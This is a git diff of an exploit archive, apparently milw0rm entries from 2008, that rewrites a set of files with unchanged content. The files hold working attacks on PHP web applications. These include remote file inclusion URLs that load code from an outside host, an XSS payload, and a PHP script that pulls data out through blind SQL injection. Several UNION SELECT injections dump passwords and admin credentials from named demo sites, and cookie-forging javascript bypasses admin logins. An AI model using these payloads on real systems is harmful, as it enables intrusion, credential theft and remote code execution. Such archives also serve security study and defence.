-http://poop.com/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+
-
-**************************************************************************************
-
-# milw0rm.com [2008-10-31]
+**************************************************************************************
+ModernBill .:. Client Billing System - User Login
+ModernBill  <= v4.4.X Remote File Inclusion Vulnerability  and xss by nigh7f411
+http://xc0r3.net/
+plezz go to ttp://xc0r3.net/forums/
+**************************************************************************************
+
+rfi
+http://poop.com/include/scripts/export_batch.inc.php?DIR=http://xc0r3.net/x2300.txt?
+http://poop.com/include/scripts/run_auto_suspend.cron.php?DIR=http://xc0r3.net/x2300.txt?
+http://poop.com/include/scripts/send_email_cache.php?DIR=http://xc0r3.net/x2300.txt?
+http://poop.com/include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://xc0r3.net/x2300.txt?
+http://poop.com/include/html/nettools.popup.php?DIR=http://xc0r3.net/x2300.txt?
+
+xss
+http://poop.com/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+/index.php?op=login&submit=submit&submit=submit&username=111-222-1933email@address.tst&password=111-222-1933email@address.tst&new_language="+onmouseover=alert(39660.2316362732)+
+
+**************************************************************************************
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6917.php b/platforms/php/webapps/6917.php
index a4b4e8427..9f00f33ed 100755
--- a/platforms/php/webapps/6917.php
+++ b/platforms/php/webapps/6917.php
@@ -1,87 +1,87 @@
-###########################################################################
-# Kira has decide be back after halloween
-###########################################################################
-# Discovered by : Mountassif Moad
-# Type Gap : Blind Sql Injection
-# Script : Article Publisher Pro : http://www.phparticlescript.com/
-# Greetz : Allah , All my freind
-##########################################################################
-
-P0c :
-
-http://localhost/contact_author.php?userid=1+and+1=1   true
-
-http://localhost/contact_author.php?userid=1+and+1=0   false
-
-http://demo-article-publisher-pro.phparticlescript.com/contact_author.php?userid=1+and+1=1   true
-
-http://demo-article-publisher-pro.phparticlescript.com/contact_author.php?userid=1+and+1=0   false
-
-Exploit :
-
-http://localhost/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=4   true
-
-http://localhost/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=5   false
-
-Demo Test :
-
-http://fashiongumbo.com/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=4  true
-
-http://fashiongumbo.com/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=5  false
-
-code Exploit :
-
-php '.$argv[0].' http://localhost/contact_author.php?userid=1 user()
-#                                                            
-###############################################################
-');
-if ($argc > 1) {
-$url = $argv[1];
-$r = strlen(file_get_contents($url."+and+1=1"));
-echo "\nExploiting:\n";
-$w = strlen(file_get_contents($url."'+and+1=0"));
-$t = abs((100-($w/$r*100)));
-echo "\n".$argv[2].": ";
-for ($i=1; $i <= 30; $i++) {
-$laenge = strlen(file_get_contents($url."+and+ascii(substring((".$argv[2]."),".$i.",1))!=0"));
-   if (abs((100-($laenge/$r*100))) > $t-1) {
-      $count = $i;
-      $i = 30;
-   }
-}
-for ($j = 1; $j < $count; $j++) {
-   for ($i = 46; $i <= 122; $i=$i+2) {
-      if ($i == 60) {
-         $i = 98;
-      }
-      $laenge = strlen(file_get_contents($url."+and+ascii(substring((".$argv[2]."),".$j.",1))%3E".$i.""));
-      if (abs((100-($laenge/$r*100))) > $t-1) {
-         $laenge = strlen(file_get_contents($url."+and+ascii(substring((".$argv[2]."),".$j.",1))%3E".($i-1).""));
-         if (abs((100-($laenge/$r*100))) > $t-1) {
-            echo chr($i-1);
-         } else {
-            echo chr($i);
-         }
-         $i = 122;
-      }
-   }
-}
-
-} else {
-echo "\nExploiting failed: ar u sur your link have a real id user \n";
-}
-?>
-
-# milw0rm.com [2008-10-31]
+###########################################################################
+# Kira has decide be back after halloween
+###########################################################################
+# Discovered by : Mountassif Moad
+# Type Gap : Blind Sql Injection
+# Script : Article Publisher Pro : http://www.phparticlescript.com/
+# Greetz : Allah , All my freind
+##########################################################################
+
+P0c :
+
+http://localhost/contact_author.php?userid=1+and+1=1   true
+
+http://localhost/contact_author.php?userid=1+and+1=0   false
+
+http://demo-article-publisher-pro.phparticlescript.com/contact_author.php?userid=1+and+1=1   true
+
+http://demo-article-publisher-pro.phparticlescript.com/contact_author.php?userid=1+and+1=0   false
+
+Exploit :
+
+http://localhost/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=4   true
+
+http://localhost/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=5   false
+
+Demo Test :
+
+http://fashiongumbo.com/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=4  true
+
+http://fashiongumbo.com/contact_author.php?userid=1+and+1=1+and+substring(@@version,1,1)=5  false
+
+code Exploit :
+
+php '.$argv[0].' http://localhost/contact_author.php?userid=1 user()
+#                                                            
+###############################################################
+');
+if ($argc > 1) {
+$url = $argv[1];
+$r = strlen(file_get_contents($url."+and+1=1"));
+echo "\nExploiting:\n";
+$w = strlen(file_get_contents($url."'+and+1=0"));
+$t = abs((100-($w/$r*100)));
+echo "\n".$argv[2].": ";
+for ($i=1; $i <= 30; $i++) {
+$laenge = strlen(file_get_contents($url."+and+ascii(substring((".$argv[2]."),".$i.",1))!=0"));
+   if (abs((100-($laenge/$r*100))) > $t-1) {
+      $count = $i;
+      $i = 30;
+   }
+}
+for ($j = 1; $j < $count; $j++) {
+   for ($i = 46; $i <= 122; $i=$i+2) {
+      if ($i == 60) {
+         $i = 98;
+      }
+      $laenge = strlen(file_get_contents($url."+and+ascii(substring((".$argv[2]."),".$j.",1))%3E".$i.""));
+      if (abs((100-($laenge/$r*100))) > $t-1) {
+         $laenge = strlen(file_get_contents($url."+and+ascii(substring((".$argv[2]."),".$j.",1))%3E".($i-1).""));
+         if (abs((100-($laenge/$r*100))) > $t-1) {
+            echo chr($i-1);
+         } else {
+            echo chr($i);
+         }
+         $i = 122;
+      }
+   }
+}
+
+} else {
+echo "\nExploiting failed: ar u sur your link have a real id user \n";
+}
+?>
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6918.txt b/platforms/php/webapps/6918.txt
index 75b71ee41..a6bf82ea1 100755
--- a/platforms/php/webapps/6918.txt
+++ b/platforms/php/webapps/6918.txt
@@ -1,34 +1,34 @@
-###########################################################################
-# Kira has decide be back after halloween
-###########################################################################
-# Discovered by : Mountassif Moad
-# Type Gap : Blind Sql Injection
-# Script : SFS EZ Auction Remote Blind sql injection
-# Home Script : http://www.scripts-for-sites.info/item.php?item=97
-# Greetz : Allah , All my freind
-##########################################################################
-
-
-P0c :
-
-http://localhost/viewfaqs.php?cat=1+and+1=1 true
-
-http://localhost/viewfaqs.php?cat=1+and+1=1 false
-
-http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1 true
-
-http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1 false
-
-Exploit :
-
-http://localhost/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=5
-
-http://localhost/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=4
-
-Demo :
-
-http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=5
-
-http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=4
-
-# milw0rm.com [2008-10-31]
+###########################################################################
+# Kira has decide be back after halloween
+###########################################################################
+# Discovered by : Mountassif Moad
+# Type Gap : Blind Sql Injection
+# Script : SFS EZ Auction Remote Blind sql injection
+# Home Script : http://www.scripts-for-sites.info/item.php?item=97
+# Greetz : Allah , All my freind
+##########################################################################
+
+
+P0c :
+
+http://localhost/viewfaqs.php?cat=1+and+1=1 true
+
+http://localhost/viewfaqs.php?cat=1+and+1=1 false
+
+http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1 true
+
+http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1 false
+
+Exploit :
+
+http://localhost/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=5
+
+http://localhost/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=4
+
+Demo :
+
+http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=5
+
+http://phpauctions.info/demo/viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=4
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6919.txt b/platforms/php/webapps/6919.txt
index 795c4840c..1918cb2e1 100755
--- a/platforms/php/webapps/6919.txt
+++ b/platforms/php/webapps/6919.txt
@@ -1,26 +1,26 @@
-###########################################################################
-# Kira has decide be back after halloween
-###########################################################################
-# Discovered by : Mountassif Moad
-# Type Gap : Sql execution
-# Script : SFS EZ Career Remote sql execution
-# Home Script : http://www.scripts-for-sites.info/item.php?item=92
-# Greetz : Allah , All my freind
-##########################################################################
-
-
-Exploit :
-
-http://localhost/[career]/content.php?topic=user()
-http://localhost/[career]/content.php?topic=version()
-http://localhost/[career]/content.php?topic=database()
-http://localhost/[career]/content.php?topic=id
-
-
-Demo :
-http://www.turnkeyzone.com/demos/career/content.php?topic=id
-http://www.turnkeyzone.com/demos/career/content.php?topic=version()
-http://www.turnkeyzone.com/demos/career/content.php?topic=user()
-http://www.turnkeyzone.com/demos/career/content.php?topic=database()
-
-# milw0rm.com [2008-10-31]
+###########################################################################
+# Kira has decide be back after halloween
+###########################################################################
+# Discovered by : Mountassif Moad
+# Type Gap : Sql execution
+# Script : SFS EZ Career Remote sql execution
+# Home Script : http://www.scripts-for-sites.info/item.php?item=92
+# Greetz : Allah , All my freind
+##########################################################################
+
+
+Exploit :
+
+http://localhost/[career]/content.php?topic=user()
+http://localhost/[career]/content.php?topic=version()
+http://localhost/[career]/content.php?topic=database()
+http://localhost/[career]/content.php?topic=id
+
+
+Demo :
+http://www.turnkeyzone.com/demos/career/content.php?topic=id
+http://www.turnkeyzone.com/demos/career/content.php?topic=version()
+http://www.turnkeyzone.com/demos/career/content.php?topic=user()
+http://www.turnkeyzone.com/demos/career/content.php?topic=database()
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6920.txt b/platforms/php/webapps/6920.txt
index 9e2b607f7..cd3583c79 100755
--- a/platforms/php/webapps/6920.txt
+++ b/platforms/php/webapps/6920.txt
@@ -1,18 +1,18 @@
-###########################################################################
-# Kira has decide be back after halloween
-###########################################################################
-# Discovered by : Mountassif Moad
-# Type Gap : Sql injection
-# Script : SFS EZ Top Sites  Remote sql Injection
-# Home Script : http://www.scripts-for-sites.info/item.php?item=112
-# Greetz : Allah , All my freind
-##########################################################################
-
-http://localhost/topsites/topsite.php?ts=-1/**/UNION/**/SELECT/**/1,password,3,4,5+from+users/*
-
-Demo :
-
-http://turnkeyzone.com/demos/topsites/topsite.php?ts=-1/**/UNION/**/SELECT/**/1,password,3,4,5+from+users/*
-http://turnkeyzone.com/demos/topsites/topsite.php?ts=-169%20union%20select%201,2,3,4,5/*
-
-# milw0rm.com [2008-10-31]
+###########################################################################
+# Kira has decide be back after halloween
+###########################################################################
+# Discovered by : Mountassif Moad
+# Type Gap : Sql injection
+# Script : SFS EZ Top Sites  Remote sql Injection
+# Home Script : http://www.scripts-for-sites.info/item.php?item=112
+# Greetz : Allah , All my freind
+##########################################################################
+
+http://localhost/topsites/topsite.php?ts=-1/**/UNION/**/SELECT/**/1,password,3,4,5+from+users/*
+
+Demo :
+
+http://turnkeyzone.com/demos/topsites/topsite.php?ts=-1/**/UNION/**/SELECT/**/1,password,3,4,5+from+users/*
+http://turnkeyzone.com/demos/topsites/topsite.php?ts=-169%20union%20select%201,2,3,4,5/*
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6922.txt b/platforms/php/webapps/6922.txt
index f3f3b11cc..dcd938e58 100755
--- a/platforms/php/webapps/6922.txt
+++ b/platforms/php/webapps/6922.txt
@@ -1,39 +1,39 @@
-[~] SFS EZ WEBSTORE remote sql inj
-[~]
-[~] SearchResults.php (where)
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 01.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] 
-[~] N0T: a.q kpss : ) )
-[~]
-[~] -----------------------------------------------------------
-
-Exploit:
-
-http://localhost/script_path/SearchResults.php?SearchTerm=ZoRLu&where=[SQL]
-
-[SQL]=
-
-ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
-
-demo
-
-http://turnkeyzone.com/demos/store/SearchResults.php?SearchTerm=ZoRLu&where=ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-01]
+[~] SFS EZ WEBSTORE remote sql inj
+[~]
+[~] SearchResults.php (where)
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 01.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] 
+[~] N0T: a.q kpss : ) )
+[~]
+[~] -----------------------------------------------------------
+
+Exploit:
+
+http://localhost/script_path/SearchResults.php?SearchTerm=ZoRLu&where=[SQL]
+
+[SQL]=
+
+ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
+
+demo
+
+http://turnkeyzone.com/demos/store/SearchResults.php?SearchTerm=ZoRLu&where=ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6923.txt b/platforms/php/webapps/6923.txt
index 90fd4325a..e3c6bb221 100755
--- a/platforms/php/webapps/6923.txt
+++ b/platforms/php/webapps/6923.txt
@@ -1,26 +1,26 @@
-###########################################################################
-      ______    __  __   ______          __                ______                   
-     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
-    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
-   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
-  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
-        /____/                                           
-
-# Discovered by : Hakxer
-# Type Gap : SQL Injection
-# Script : 	SFS EZ Pub Site 
-# Greetz : Allah , Egyptian x hacker , Str0ke  :) 
-##########################################################################
-
-# [~] Poc : 
-http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/*
-# [~] Exploit :
-http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,database(),9,10,11,12,13,14/*
-OR
-http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/*
-		
-
-# Proud To be a Muslim #
-#_=END=_#
-
-# milw0rm.com [2008-11-01]
+###########################################################################
+      ______    __  __   ______          __                ______                   
+     / ____/___ \ \/ /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
+    / __/ / __ `/\  /  / /   / __ \/ __  / _ \/ ___/ ___/  / / / _ \/ __ `/ __ `__ \
+   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
+  /_____/\__, / /_/   \____/\____/\__,_/\___/_/  /____/  /_/  \___/\__,_/_/ /_/ /_/ 
+        /____/                                           
+
+# Discovered by : Hakxer
+# Type Gap : SQL Injection
+# Script : 	SFS EZ Pub Site 
+# Greetz : Allah , Egyptian x hacker , Str0ke  :) 
+##########################################################################
+
+# [~] Poc : 
+http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/*
+# [~] Exploit :
+http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,database(),9,10,11,12,13,14/*
+OR
+http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/*
+		
+
+# Proud To be a Muslim #
+#_=END=_#
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6924.txt b/platforms/php/webapps/6924.txt
index 217fb5647..9ff9176a3 100755
--- a/platforms/php/webapps/6924.txt
+++ b/platforms/php/webapps/6924.txt
@@ -1,37 +1,37 @@
-[~] SFS EZ Gaming Cheats remote sql inj
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 01.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] 
-[~] N0T: a.q kpss : ) )
-[~]
-[~] -----------------------------------------------------------
-
-Exploit:
-
-http://localhost/script_path/view_reviews.php?id=[SQL]
-
-[SQL]=
-
--999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--
-
-demo
-
-http://turnkeyzone.com/demos/cheats/view_reviews.php?id=-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-01]
+[~] SFS EZ Gaming Cheats remote sql inj
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 01.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] 
+[~] N0T: a.q kpss : ) )
+[~]
+[~] -----------------------------------------------------------
+
+Exploit:
+
+http://localhost/script_path/view_reviews.php?id=[SQL]
+
+[SQL]=
+
+-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--
+
+demo
+
+http://turnkeyzone.com/demos/cheats/view_reviews.php?id=-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6925.txt b/platforms/php/webapps/6925.txt
index 7b4167d1c..f7d6647b0 100755
--- a/platforms/php/webapps/6925.txt
+++ b/platforms/php/webapps/6925.txt
@@ -1,26 +1,26 @@
-# Bloggie Lite 0.0.2 Beta SQl Injection by Insecure Cookie Handling
-# url: http://mywebland.com/download.php?id=20
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-
-vuln file: /genscode.php
-vuln code:
-39: $user_ip = $_SERVER['REMOTE_ADDR'];
-    define('COMMENT_COOKIE', md5($user_ip));
-    if(isset($_COOKIE[COMMENT_COOKIE])) {
-xx: ...
-    $comment_cookie = $_COOKIE[COMMENT_COOKIE];
-55: $sql = "SELECT * FROM ".SCODE_TBL." WHERE cookie = '".$comment_cookie."'";
-
-exploit:
-javascript:document.cookie = "f528764d624db129b32c21fbca0cb8d6=127.0.0.1'+union+all+select+user(),user(),user()/*; path=/";
-
-Hack0wn :D
-
-# milw0rm.com [2008-11-01]
+# Bloggie Lite 0.0.2 Beta SQl Injection by Insecure Cookie Handling
+# url: http://mywebland.com/download.php?id=20
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+
+vuln file: /genscode.php
+vuln code:
+39: $user_ip = $_SERVER['REMOTE_ADDR'];
+    define('COMMENT_COOKIE', md5($user_ip));
+    if(isset($_COOKIE[COMMENT_COOKIE])) {
+xx: ...
+    $comment_cookie = $_COOKIE[COMMENT_COOKIE];
+55: $sql = "SELECT * FROM ".SCODE_TBL." WHERE cookie = '".$comment_cookie."'";
+
+exploit:
+javascript:document.cookie = "f528764d624db129b32c21fbca0cb8d6=127.0.0.1'+union+all+select+user(),user(),user()/*; path=/";
+
+Hack0wn :D
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6927.txt b/platforms/php/webapps/6927.txt
index 4dee8b0a7..c59e75b67 100755
--- a/platforms/php/webapps/6927.txt
+++ b/platforms/php/webapps/6927.txt
@@ -1,44 +1,44 @@
-###############################################################
-#################### Viva IslaM Viva IslaM ####################
-##
-## Remote SQL injection Vulnerability
-##
-## AJ ARTICLE ( featured_article.php mode )
-##                            
-###############################################################
-###############################################################
-##
-## AuTh0r : Mr.SQL
-##
-## H0ME   : WwW.PaL-HaCkEr.CoM  &&  WwW.AtsDp.CoM/f
-##
-## Email  : SQL@Hotmail.it
-##
-## SYRiAN Arab HACkErS
-########################
-########################
-##
-##  Name : AJ ARTICLE
-##
-##  Site : www.ajsquare.com
-##
-########################
-########################
-##
-##  -(:: L!VE DEMO ::)-
-##
-##  http://www.ajsquare.com/products/demo/featured_article.php?mode=detail&page=&artid=-109+union+select+0,0,0,0,concat_ws(0x3a,username,admin_password),0,0,0,0,0,0,0+from+admin--
-##
-########################
-########################
-
- 
-#######################################################################################################
-#######################################################################################################
-                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
-                                         
- :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
-#######################################################################################################
-#######################################################################################################
-
-# milw0rm.com [2008-11-01]
+###############################################################
+#################### Viva IslaM Viva IslaM ####################
+##
+## Remote SQL injection Vulnerability
+##
+## AJ ARTICLE ( featured_article.php mode )
+##                            
+###############################################################
+###############################################################
+##
+## AuTh0r : Mr.SQL
+##
+## H0ME   : WwW.PaL-HaCkEr.CoM  &&  WwW.AtsDp.CoM/f
+##
+## Email  : SQL@Hotmail.it
+##
+## SYRiAN Arab HACkErS
+########################
+########################
+##
+##  Name : AJ ARTICLE
+##
+##  Site : www.ajsquare.com
+##
+########################
+########################
+##
+##  -(:: L!VE DEMO ::)-
+##
+##  http://www.ajsquare.com/products/demo/featured_article.php?mode=detail&page=&artid=-109+union+select+0,0,0,0,concat_ws(0x3a,username,admin_password),0,0,0,0,0,0,0+from+admin--
+##
+########################
+########################
+
+ 
+#######################################################################################################
+#######################################################################################################
+                                  -(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
+                                         
+ :: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: ****** :: MuslimS HaCkErS ::
+#######################################################################################################
+#######################################################################################################
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6928.txt b/platforms/php/webapps/6928.txt
index 215738840..aa91552c5 100755
--- a/platforms/php/webapps/6928.txt
+++ b/platforms/php/webapps/6928.txt
@@ -1,41 +1,41 @@
-==================================================================================================================
-
-
-  [o] Flash Tree Gallery 1.0 Remote File Inclusion Vulnerability
-
-       Software : com_treeg version 1.0
-       Vendor   : http://justjoomla.net/
-       Author   : NoGe
-       Contact  : noge[dot]code[at]gmail[dot]com
-
-
-==================================================================================================================
-
-
-  [o] Vulnerable file
-
-       administrator/components/com_treeg/admin.treeg.php
-
-        include( "$mosConfig_live_site/components/com_treeg/about.html" );
-
-
-
-  [o] Exploit
-
-       http://localhost/[path]/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=[evilcode]
-
-
-==================================================================================================================
-
-
-  [o] Greetz
-
-       MainHack BrotherHood [ www.mainhack.com - http://serverisdown.org/blog/]
-       VOP Crew [ Vrs-hCk OoN_BoY Paman ]
-       H312Y yooogy mousekill }^-^{ kaka11  martfella
-       skulmatic olibekas ulga Cungkee k1tk4t str0ke
-
-        
-==================================================================================================================
-
-# milw0rm.com [2008-11-01]
+==================================================================================================================
+
+
+  [o] Flash Tree Gallery 1.0 Remote File Inclusion Vulnerability
+
+       Software : com_treeg version 1.0
+       Vendor   : http://justjoomla.net/
+       Author   : NoGe
+       Contact  : noge[dot]code[at]gmail[dot]com
+
+
+==================================================================================================================
+
+
+  [o] Vulnerable file
+
+       administrator/components/com_treeg/admin.treeg.php
+
+        include( "$mosConfig_live_site/components/com_treeg/about.html" );
+
+
+
+  [o] Exploit
+
+       http://localhost/[path]/administrator/components/com_treeg/admin.treeg.php?mosConfig_live_site=[evilcode]
+
+
+==================================================================================================================
+
+
+  [o] Greetz
+
+       MainHack BrotherHood [ www.mainhack.com - http://serverisdown.org/blog/]
+       VOP Crew [ Vrs-hCk OoN_BoY Paman ]
+       H312Y yooogy mousekill }^-^{ kaka11  martfella
+       skulmatic olibekas ulga Cungkee k1tk4t str0ke
+
+        
+==================================================================================================================
+
+# milw0rm.com [2008-11-01]
diff --git a/platforms/php/webapps/6929.txt b/platforms/php/webapps/6929.txt
index 5b896b7a9..cf2fddef0 100755
--- a/platforms/php/webapps/6929.txt
+++ b/platforms/php/webapps/6929.txt
@@ -1,88 +1,88 @@
-[~] Article Publisher PRO Insecure Cookie Handling Vulnerability
-[~]
-[~] version: 1.5
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 01.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~] 
-[~] N0T: a.q kpss : ) )
-[~]
-[~] ----------------------------------------------------------
-
-demo admin login:
-
-http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php
-
-demo user login:
-
-http://demo-article-publisher-pro.phparticlescript.com/login.php
-
-
-admin_name: admin
-
-passwd: demo
-
-passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229
-
-user_id: 1
-
-or
-
-user_name: zorlu
-
-passwd: zorlu
-
-passwd_md5: 2178fb3ee4a88f946ecb68734b266c10
-
-user_id: 6
-
-or
-
-user_name: demo
-
-passwd: demo
-
-passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229
-
-user_id: 2
-
-
-exploit:
-
-admin:
-
-javascript:document.cookie = "xadmin=user_id%2Cpasswd_md5; path=/";
-
-user: 
-
-javascript:document.cookie = "user=user_id%2Cpasswd_md5; path=/";
-
-for demo admin: ( user_id: 1)
-
-javascript:document.cookie = "xadmin=1%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";
-
-for demo user: ( for user zorlu user_id: 6 )
-
-javascript:document.cookie = "user=6%2C2178fb3ee4a88f946ecb68734b266c10; path=/";
-
-for demo user: ( for user demo user_id: 2 )
-
-javascript:document.cookie = "user=2%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-01]
+[~] Article Publisher PRO Insecure Cookie Handling Vulnerability
+[~]
+[~] version: 1.5
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 01.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~] 
+[~] N0T: a.q kpss : ) )
+[~]
+[~] ----------------------------------------------------------
+
+demo admin login:
+
+http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php
+
+demo user login:
+
+http://demo-article-publisher-pro.phparticlescript.com/login.php
+
+
+admin_name: admin
+
+passwd: demo
+
+passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229
+
+user_id: 1
+
+or
+
+user_name: zorlu
+
+passwd: zorlu
+
+passwd_md5: 2178fb3ee4a88f946ecb68734b266c10
+
+user_id: 6
+
+or
+
+user_name: demo
+
+passwd: demo
+
+passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229
+
+user_id: 2
+
+
+exploit:
+
+admin:
+
